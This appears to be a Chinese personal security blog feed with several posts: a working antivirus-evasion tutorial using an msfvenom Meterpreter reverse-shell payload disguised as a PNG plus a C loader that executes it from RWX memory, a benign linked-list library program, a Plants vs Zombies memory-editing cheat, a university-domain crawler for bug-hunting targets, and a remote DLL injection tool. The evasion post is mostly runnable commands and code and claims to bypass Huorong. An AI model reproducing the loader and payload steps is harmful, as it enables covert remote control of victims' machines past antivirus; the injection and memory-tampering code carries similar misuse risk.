厂长@Xinux 发布的文章

文件分离免杀

概要:
shellcode(恶意代码) 以某种形式存在,通过一些手段,载入到本地,加载器加载执行,就是将shellcode分离了出去一某种文件形式存在,也可以将他存储到本地或存储到VPS中进行下载执行。在一些特殊情况下可以起到一些较好的效果。

生成shellcode

首先生成shellcode文件,可以用msfvemon,CS等现有工具,生成一段二进制 raw格式代码,保存成图片文件。

这里我用的是自己的VPS

msfvenom -p windows/meterpreter/reverse_tcp lhost=你的ip lport=你的端口  -f  raw >shell.png

msfvenom生成shellcode

下载shell.png到本地

下载到本地

开启msf的监听

#进入msf框架
root@VM-16-15-ubuntu:~# msfconsole
#开启监听模块
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
#配置参数
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 4399
lport => 4399
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
#开启监听
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:4399

开启监听

编写文件分离恶意Loder

开发工具:

  • visual studio 2019 下载Cpp/C编译环境
#define  _CRT_SECURE_NO_WARNINGS
//取消对危险函数的警告
 
#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
//引入所需的头文件

#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
//不显示cmd窗口

int main() {
  FILE* fp;
  //定义文件指针
  size_t size;
  //定义大小用来存储shellcode
  unsigned char* buffer;
  //无符号(非负数)字符型指针变量
  
  //打开本地图片 图片中是shellcode恶意代码
  fp = fopen("shell.png", "rb");
  //操作文件指针fp
  fseek(fp, 0, SEEK_END);
  size = ftell(fp);
  fseek(fp, 0, SEEK_SET);
  buffer = (unsigned char *)malloc(size);
  fread(buffer, size, 1, fp);
  void* exec = VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  memcpy(exec, buffer, size);
  ((void(*)())exec)();
  return 0;

}

2023-11-16T11:22:15.png

尝试杀毒

结果很惊喜,火绒看不上我们,没有报毒,接下来查看上线情况!

免杀火绒

查看上线

成功上线

上线情况

本文原日期为2022年5月4日,到今天是否免杀各位自测

效果
C语言双向链表学习
编程是安全狗必不可少的一项技能,今日所书写的内容就是学习中的一些内容。
双向链表小项目 “图书管理系统” 它又叫DobleLinkBookLibrarySystemProject没想到吧,这么个小东西还有这么吊的名字!
release版本:成品下载

代码:
头文件 fuzz.h

#pragma once
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <windows.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>
struct Book* AppendBook(struct Book* CurrentBook, char * bookName, int bookNumber, float bookPrice);

int main();

c文件
BookLibraryEntry.c

#include "fuzz.h"


struct Book {
    int BookNumber;
    char BookName[50];
    float BookPrice;
    struct Book* UpLink;
    struct Book* DownLink;
};
//书籍头节点
struct Book* Books = NULL;
//
int nCount = 0;
//添加书籍
struct Book* AppendBook(struct Book* CurrentBook,char * bookName,int bookNumber, float bookPrice) {
    //1空节点 是第一次添加
    if (CurrentBook==NULL)
    {
        CurrentBook = (struct Book*)malloc(sizeof(struct Book));
        CurrentBook->BookNumber = bookNumber;
        strncpy(CurrentBook->BookName, bookName,50);
        CurrentBook->BookPrice = bookPrice;
        CurrentBook->UpLink = NULL;
        CurrentBook->DownLink = NULL;
        nCount++;
        system("cls");
        printf("添加成功!\n");
        system("pause");
        system("cls");
        //syste
        return CurrentBook;
    }
    else
    {
        struct Book * TempBookNode = (struct Book*)malloc(sizeof(struct Book));
        CurrentBook->DownLink = TempBookNode;
        TempBookNode->UpLink = CurrentBook;
        TempBookNode->BookNumber = bookNumber;
        strncpy(TempBookNode->BookName, bookName, 50);
        TempBookNode->BookPrice = bookPrice;
        TempBookNode->DownLink = NULL;
        nCount++;
        system("cls");
        printf("添加成功!\n");
        system("pause");
        system("cls");
        return TempBookNode;
    }
}
//查询所有书籍
void QueryALLBooks(struct Book* CurrentBook) {
    if (CurrentBook==NULL)
    {
        printf("图书馆内没有书籍,请先添加书籍!\n");
        return;
    }
    /*while (CurrentBook->UpLink!=NULL)
    {
        printf("编号:%d 书名:%s 价格:%f\n", CurrentBook->BookNumber, CurrentBook->BookName, CurrentBook->BookPrice);
        CurrentBook = CurrentBook->UpLink;
    }*/
    if (CurrentBook->UpLink==NULL)
    {
        printf("编号:%d 书名:%s 价格:%f\n", CurrentBook->BookNumber, CurrentBook->BookName, CurrentBook->BookPrice);
    }
    else {
        for (size_t i = 0; i < (nCount-1); i++)
        {
            //printf("编号:%d 书名:%s 价格:%f\n", CurrentBook->BookNumber, CurrentBook->BookName, CurrentBook->BookPrice);
            CurrentBook = CurrentBook->UpLink;
        }
        for (size_t i = 0; i < nCount; i++)
        {
            printf("编号:%d 书名:%s 价格:%f\n", CurrentBook->BookNumber, CurrentBook->BookName, CurrentBook->BookPrice);
            CurrentBook = CurrentBook->DownLink;
        }
    }
    
}
bool QueryTheBook(struct Book* CurrentBook, char* bookName) {

        for (size_t i = 0; i < (nCount - 1); i++)
        {
            //printf("编号:%d 书名:%s 价格:%f\n", CurrentBook->BookNumber, CurrentBook->BookName, CurrentBook->BookPrice);
            CurrentBook = CurrentBook->UpLink;
        }
        for (size_t i = 0; i < nCount; i++)
        {
            //printf("%s\n", CurrentBook->BookName);
            if (!strcmp(CurrentBook->BookName,bookName))
            {
                system("cls");
                printf("已经找到《%s》这本书!\n", bookName);
                printf("编号:%d 书名:%s 价格:%f\n", CurrentBook->BookNumber, CurrentBook->BookName, CurrentBook->BookPrice);
                return true;
            }
            
            CurrentBook = CurrentBook->DownLink;
            
        }
    
        return false;
}


void Menu() {
    printf(" ======Xinux Ver1.0==========\n");
    printf("||1.添加书籍                 =\n");
    printf("||2.查询所有书籍             =\n");
    printf("||3.查询指定书籍             =\n");
    printf("||4.修改书籍价格             =\n");
    printf("||5.删除书籍                 =\n");
    printf(" ============================\n");
    //system("color a");
}

bool ModifyBookPrice(struct Book* CurrentBook, char* bookName) {

    for (size_t i = 0; i < (nCount - 1); i++)
    {
        CurrentBook = CurrentBook->UpLink;
    }
    for (size_t i = 0; i < nCount; i++)
    {
        //printf("%s\n", CurrentBook->BookName);
        if (!strcmp(CurrentBook->BookName, bookName))
        {
            printf("已经找到《%s》这本书!当前价格为%f .\n", bookName,CurrentBook->BookPrice);
            char* tmpbkName = CurrentBook->BookName;
            int tmpbkNumber = CurrentBook->BookNumber;
            float tmpbkPrice = CurrentBook->BookPrice;

            printf("请输入最新价格:");
            float newPrice = 0;
            scanf("%f", &newPrice);
            CurrentBook->BookPrice = newPrice;
            printf("原-->编号:%d 书名:%s 价格:%f\n", tmpbkNumber, tmpbkName, tmpbkPrice);
            printf("新-->编号:%d 书名:%s 价格:%f\n", CurrentBook->BookNumber, CurrentBook->BookName, CurrentBook->BookPrice);

            return true;
        }

        CurrentBook = CurrentBook->DownLink;
    }
    return false;
}


bool DelBook(struct Book** pBooks, char* bookName) {
    struct Book* CurrentBook = *pBooks;

    // 查找要删除的书籍
    while (CurrentBook != NULL) {
        if (strcmp(CurrentBook->BookName, bookName) == 0) {
            printf("已经找到《%s》这本书!正在执行删除操作.\n", bookName);

            // 保存要删除的节点的前一个和后一个节点
            struct Book* prevBook = CurrentBook->UpLink;
            struct Book* nextBook = CurrentBook->DownLink;

            // 释放要删除的节点的内存
            free(CurrentBook);

            // 更新链表连接
            if (prevBook != NULL) {
                prevBook->DownLink = nextBook;
            }
            else {
                // 如果删除的是第一个节点,更新头节点指针
                *pBooks = nextBook;
            }

            if (nextBook != NULL) {
                nextBook->UpLink = prevBook;
            }

            nCount--;
            return true;
        }

        CurrentBook = CurrentBook->DownLink;
    }

    // 未找到要删除的书籍
    return false;
}

int main() {
    //命令
    int inCmd = 0;
    char BookName[50];
    int BookNumber = 0;
    float BookPrice = 0.0;
    while (1)
    {
        Menu();
        printf("请输入相关指令:");
        scanf("%d", &inCmd);
        switch (inCmd)
        {
        case 1:
            //添加书籍
            memset(BookName, 0, 50);
            printf("请输入书籍名称:\n");
            scanf("%s", BookName);
            printf("请输入书籍编号:\n");
            scanf("%d", &BookNumber);
            printf("请输入书籍价格:\n");
            scanf("%f", &BookPrice);
            Books = AppendBook(Books,BookName,BookNumber,BookPrice);
            break;
        case 2:
            //查询所有书籍
            system("cls");
            QueryALLBooks(Books);
            system("pause");
            system("cls");
            break;
        case 3:
            //查询指定书籍
            if (nCount==0)
            {
                system("cls");
                printf("图书馆里没有书,请先添加书籍.\n");
                system("pause");
                system("cls");

                break;
            }
            memset(BookName, 0, 50);
            printf("请输入要查询的指定书籍名称:\n");
            scanf("%s", BookName);
            bool isFound = QueryTheBook(Books, BookName);
            if (!isFound) {
                system("cls");
                printf("无此书籍!\n");
                system("pause");
            }
            else
            {
                system("pause");
                system("cls");
            }
            break;
        case 4:
            //修改书籍价格
            if (nCount == 0)
            {
                system("cls");
                printf("图书馆里没有书,请先添加书籍.\n");
                system("pause");
                system("cls");

                break;
            }
            memset(BookName, 0, 50);
            printf("请输入要修改价格的书籍名称:\n");
            scanf("%s", BookName);
            bool isTrue = ModifyBookPrice(Books,BookName);
            if (isTrue)
            {
                printf("修改成功!\n");
                system("pause");
                system("cls");
            }
            else
            {

                printf("修改失败!\n");
                system("pause");
                system("cls");
            }
            break;
        case 5:
            //删除书籍
            if (nCount == 0)
            {
                system("cls");
                printf("图书馆里没有书,请先添加书籍.\n");
                system("pause");
                system("cls");
                break;
            }
            printf("请输入要删除的书籍名称:\n");
            scanf("%s", BookName);
            if (DelBook(&Books, BookName)) {
                printf("删除成功!\n");
                system("pause");
                system("cls");
            }
            else
            {
                printf("删除失败!\n");
                system("pause");
                system("cls");
            }
            break;
        default:
            break;
        }
    }
    return 0;
}

C++植物大战僵尸无限阳光,无冷缩

免责声明:本代码只允许对C++编程研究,切勿用在其他非法用途
先上效果:

效果演示

适合的游戏版本
植物大战僵尸年度版(来自同学的优盘emmmmm)
下载:游戏
下载:外挂

代码部分
环境visual studio 2019 编译直接用

#include <iostream>
#include <windows.h>
#include <thread>
#define Ver Ver2.0
using namespace std;
DWORD DPid{ 0 };

//菜单函数 每次输入完指令都会调用它 重新打印下菜单
void menu() {
    cout << "***********************" << endl;
    cout << "**** 1、修改阳光值 ****" << endl;
    cout << "**** 2、全员无冷却 ****" << endl;
    cout << "**** 0、退出本程序 ****" << endl;
    cout << "***********************" << endl;
    cout << "请输入相关指令:" << endl;
}
//修改阳光函数
void yG(DWORD pid) {
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DPid);
    if (hProcess == NULL)
    {
        printf("你当前尚未进入关卡!请进入游戏关卡:自动获取阳光");
    }
    DWORD YGJZ{ 0x00755E0C }; //静态基址
    DWORD YGJZValue{ 0 };
    DWORD nSize{ 0 };
    BOOL ok = ReadProcessMemory(hProcess, (LPVOID)YGJZ, &YGJZValue, sizeof(DWORD), &nSize);
    DWORD YGjz2{ 0x868 }; //一级偏移
    DWORD YGjz2Value{ 0 };
    BOOL ok2 = ReadProcessMemory(hProcess, (LPVOID)(YGJZValue + YGjz2), &YGjz2Value, sizeof(DWORD), &nSize);
    DWORD YGJZ3{ 0x5578 }; //二级偏移
    DWORD YGJZ3Value{ 0 };
    BOOL OK3 = ReadProcessMemory(hProcess, (LPVOID)(YGjz2Value + YGJZ3), &YGJZ3Value, sizeof(DWORD), &nSize);
    cout << "当前阳光值:[ " << YGJZ3Value << " ] \n请输入要修改的阳光值:\n";  //最终及地址
    int edit;
    cin >> edit;
    BOOL wri = WriteProcessMemory(hProcess, (LPVOID)(YGjz2Value + YGJZ3), &edit, sizeof(edit), &nSize);
    if (wri == true)
    {
        cout << "写入成功!" << endl;
    }
}

//修改冷缩函数
void lS(DWORD pid) {
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DPid);
    DWORD kc1{ 0x00755E0C };
    DWORD kc1Value{ 0 };
    ReadProcessMemory(hProcess, (LPVOID)kc1, &kc1Value, sizeof(DWORD), NULL);
    DWORD kc2{ 0x868 };
    DWORD kc2Value{ 0 };
    ReadProcessMemory(hProcess, (LPVOID)(kc1Value + kc2), &kc2Value, sizeof(DWORD), NULL);
    DWORD kc3{ 0x15C };
    DWORD kc3Value{ 0 };
    ReadProcessMemory(hProcess, (LPVOID)(kc2Value + kc3), &kc3Value, sizeof(DWORD), NULL);
    DWORD kc4{ 0x70 };
    DWORD kc4Value{ 0 };
    ReadProcessMemory(hProcess, (LPVOID)(kc3Value + kc4), &kc4Value, sizeof(DWORD), NULL);
    int t = 1;
    BOOL OK = WriteProcessMemory(hProcess, (LPVOID)(kc3Value + kc4), &t, sizeof(t), NULL);
    if (OK == true)
    {
        cout << "全员无冷却成功!" << endl;
        while (true)
        {
            WriteProcessMemory(hProcess, (LPVOID)(kc3Value + kc4), &t, sizeof(t), NULL);
            for (int i = 20; i <= 20 * 9; i += 20)
            {
                WriteProcessMemory(hProcess, (LPVOID)(kc3Value + (kc4 + ((0x4) * i))), &t, sizeof(t), NULL);
            }
        }
    }
}

int main()
{
    system("mode con cols=32 lines=18  ");//设置控制台大小

    system("color a");                      //设置控制台字体颜色
    SetConsoleTitle(L"ZomKill Ver2.0");   //设置控制台标题
    cout << "多线程加持已注入......\n我赌你的枪里没有子弹" << endl;
    int z;
    z = MessageBox(GetForegroundWindow(), L"更新:\n新增植物卡槽无冷却功能\n燕双鹰附着加持事半功倍\n\n使用方法:无脑用\n小辛QQ:913499532\n官网:www.xinux.top ", L"欢迎使用辅助Ver2.0", 1);
    //弹框

    system("cls");
    HWND hGame = FindWindow(L"MainWindow", L"Plants vs. Zombies");
    int select;
    while (true)
    {
        if (hGame == NULL)
        {
            cout << "游戏未运行,请打开游戏再运行本辅助\n本程序仅支持\<\<植物大战僵尸年度版\>\>有效:游戏下载地址:\n http://www.xinux.top" << endl;
            return 0;
        }
        else
        {
            GetWindowThreadProcessId(hGame, &DPid); //拿出进程ID
            cout << "+++++++++++++++++++++++++++++\n当前游戏进程ID:" << DPid << endl;
        }
        menu();
        cin >> select;
        switch (select)
        {
        case 1:
            yG(DPid);
            break;
        case 2:
        {thread tls(lS, DPid);
        tls.detach();
        }
        break;
        case 0:
            //system("cls");
            cout << "Bye! 谢谢支持,ZomKill将带给你全新的游戏体验" << endl;
            system("pause");
            system("cls");
            return 0;
            break;
        default:
            break;
        }
        system("pause");
        system("cls");
    }
}

免责声明

本代码只允许对C++编程研究,切勿用在其他非法用途如有违反与代码作者无关。

eduSrc主域名查找脚本

二改版本,原作者项目地址:
https://github.com/Ernket/edu-crawler
原作者的可能下载下来不能直接用,这个则可以。刚改完,热乎的哈哈哈

效果,可以直接拿来用,保存到txt文件中

运行效果

用法:

直接输入省即可,用拼音的方式输入,如辽宁 liaoning

下载: https://wwux.lanzouw.com/iA1Kn0myt3od
密码:31ge

原理

首先是高校名称的获取
根据 http://u.feelingmsg.com 进行高校名称的获取

获得高校名再去bing进行搜索,将第一个结果的url提炼出来

def schoolsite(n):

global bing
for i in n:
    bingurl=bing+i
    req = requests.get(bingurl,headers=headers)
    tree=etree.HTML(req.text)
    res=tree.xpath('//div[@class="b_caption"]/div/cite/text()')    

def eduName(url):

req = requests.get(url,headers=headers)
req.encoding="gb2312"
tree = etree.HTML(req.text)
res=tree.xpath("//tr/td/span[@class='STYLE54']/a/text()")
print(res)
schoolsite(res)

最后就是结果输出到txt文件中

先上效果:

效果

远程DLL注入工具 控制台版

这是一个DLL注入工具。代码的美感可能会影响到大家的心情。作为第一个在github上发布的程序,我的心情是激动的。

程序功能:

  • 向目标进程注入DLL文件

使用方法

  1. 打开程序 输入目标成的进程id (可在任务管理器中查看)
  2. 将DLL文件所在路径填写进去 即可
  3. 如出现错误,可根据错误码自行查错
  4. 确保是否成功注入 可利用 火绒剑 工具 查看对应程序模块

下载:

[QQ913499532]()

代码部分:

代码的美观程度确实不是很好,比如循环输出-------www.xinux.vip-----这种地方,感兴趣的大佬欢迎帮忙修改。

github地址: https://github.com/XinChuanghe/DLLInjectConsole
#include <Windows.h>
#include <iostream>
#include <cstring>
using namespace std;
string::size_type pos = 0;
string str_arr;
int pID;
void MenuTools();
void Inject(int pid,char * Path);
void UnInjectDLL(int Pid);
void InjectInfo();
void Info();
int main() {
    //设置控制台大小
    system("mode con cols=55 lines=10  ");
    //设置控制台字体颜色
    system("color a");  
    //设置控制台标题
    SetConsoleTitle("DLL注入器v1.0 XinuxQQ:913499532");   
    int enter;
    while (true)
    {

        system("cls");
        MenuTools();
        cin >> enter;
        switch (enter)
        {
        case 1:
            system("cls");
            InjectInfo();
            break;
        case 2:
            system("cls");
            {
                cout << "输入卸载进程的PID:";
                cin >> pID;
                UnInjectDLL(pID);
            }
            break;
        case 0:
            exit(-1);
            break;
        default:
            cout << "输入有误!重新输入!" << endl;
            break;
        }
        system("pause");
    }
}

//注入DLL
void Inject(int pID ,char * Path) {
    //获取进程句柄
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pID);

    //申请一块虚拟内存给DLL路径
    LPVOID pReturnAddres = VirtualAllocEx(hProcess, NULL, strlen(Path) + 1, MEM_COMMIT, PAGE_READWRITE);
    //把DLL所在位置 写到上边那块申请的虚拟内存中 
    WriteProcessMemory(hProcess, pReturnAddres, Path, strlen(Path) + 1, NULL);

    //获取LoadLibraryA函数的地址
    HMODULE hModule = LoadLibrary("Kernel32.dll");
    GetProcAddress(hModule,"LoadLibraryA");

    //创建远程线程
    HANDLE hThread = CreateRemoteThread(hProcess, NULL,0,(LPTHREAD_START_ROUTINE)GetProcAddress(hModule, "LoadLibraryA"), pReturnAddres, 0, NULL);
    if (hThread == NULL)
    {
        system("cls");
        cout << "--------------------www.xinux.vip---------------------" << endl;
        cout << "[-] 注入失败,错误信息:" << GetLastError() << endl;
        return;
    }


    //防止程序线程阻塞

    WaitForSingleObject(hThread, 2000);
    //防止内存泄漏
    CloseHandle(hThread);
    CloseHandle(hProcess);
    //FreeLibrary(,)
    cout << "[+] 注入成功!" << endl;
}
//Menu
void UnInjectDLL(int Pid) {
    cout << "--------------------www.xinux.vip---------------------" << endl;
    //获取进程句柄
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pID);

    //申请一块虚拟内存给DLL路径 这个卸载直接寻址KERNEL32.DLL基址
    LPVOID pReturnAddres = (LPVOID)0x7ae00000;   //VirtualAllocEx(hProcess, NULL, strlen(Path) + 1, MEM_COMMIT, PAGE_READWRITE);


    //获取LoadLibraryA函数的地址
    //HMODULE hModule = LoadLibrary("Kernel32.dll");//0x76370000
    //GetProcAddress(hModule, "LoadLibraryA");      //0x763889c0

    //创建远程线程
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)0x763889c0, pReturnAddres, 0, NULL);
    if (hThread == NULL)
    {
        cout << "卸载失败,错误信息:" << GetLastError() << endl;
        return;
    }


    //防止程序线程阻塞

    WaitForSingleObject(hThread, 2000);
    //防止内存泄漏
    CloseHandle(hThread);
    CloseHandle(hProcess);
    //FreeLibrary(,)
    cout << "卸载DLL成功!" << endl;


}
void InjectInfo() {
    //Menu();
    cout << "--------------------www.xinux.vip---------------------" << endl;
    cout << "注入目标的进程Pid:";
    cin >> pID;
    cout << "注入DLL所在的路径:";
    cin >> str_arr;
    //cout << "原路径:" << str_arr << endl;
    while ((pos = str_arr.find("\\", pos)) != string::npos)
    {
        str_arr.insert(pos, "\\");
        pos = pos + 2;

    }
    //cout << "现路径:" << str_arr << endl;
    cout << "尝试向进程ID:" << pID << " 注入InjectDLL..." << endl;
    Inject(pID, (char*)str_arr.c_str());
}
void MenuTools() {
    cout << "--------------------www.xinux.vip---------------------" << endl;
    //cout << "Remote DLL Inject Tools" << endl;
    cout << "[1].远程注入DLL" << endl;
    cout << "[2].远程卸载DLL(目前存在Bug)" << endl;
    cout << "[0].退出" << endl;
    cout << "命令:" ;
}

结语:

不要在百度搜一些工具啊、软件啥的用,前几天我就中招了,我是想找一个DLL注入器用,没想到下到了个病毒, 这个病毒我也不咋会分析,就简单说一说把,这个病毒首先是自己安装了一款RAV杀毒来替代win10的杀毒,它的目的可能就是来替代win10的Defender,我感觉win10自己的挺强大的,他的目的就是让win10的失效,然后就是弹各种垃圾广告,真的是烦死了,

于是就自己就尝试写了这个软件,代码本身没有任何恶意。伙伴们放心使用

~很菜,望各位师父指点

[]